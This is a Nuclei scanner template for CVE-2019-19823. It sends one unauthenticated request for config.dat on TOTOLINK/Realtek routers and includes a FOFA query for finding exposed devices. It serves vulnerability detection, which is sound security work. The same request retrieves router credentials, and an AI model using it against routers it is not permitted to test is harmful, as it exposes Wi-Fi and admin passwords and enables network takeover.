id: CVE-2019-19823

info:
  name: TOTOLINK/Realtek Routers - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the "config.dat" file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
  impact: |
    Unauthenticated attackers can retrieve the entire router configuration including Wi-Fi passwords, admin credentials, and network settings, enabling complete network takeover.
  remediation: |
    Upgrade to firmware versions beyond those listed as vulnerable, or replace affected devices with patched alternatives.
  reference:
    - http://packetstormsecurity.com/files/156083/Realtek-SDK-Information-Disclosure-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19822
  classification:
    cve-id: CVE-2019-19823
    epss-score: 0.28658
    epss-percentile: 0.96626
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-306
  metadata:
    verified: true
    max-requests: 1
    vendor: totolink
    fofa-query: title="totolink"
  tags: cve,cve2019,totolink,realtek,exposure,config,boa

http:
  - method: GET
    path:
      - "{{BaseURL}}/config.dat"

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/plain")'
          - 'contains(to_lower(server), "boa")'
          - 'contains(accept_ranges, "bytes")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100a46d1994834fa786791ef70ea019a4c765f79af6a231b76c0e3aceab5eb548f6022100892a92d767a8cb5e2986b617591727c1d39e39f8214cb87cd6f616498b599aa7:922c64590222798bb761d5b6d8e72950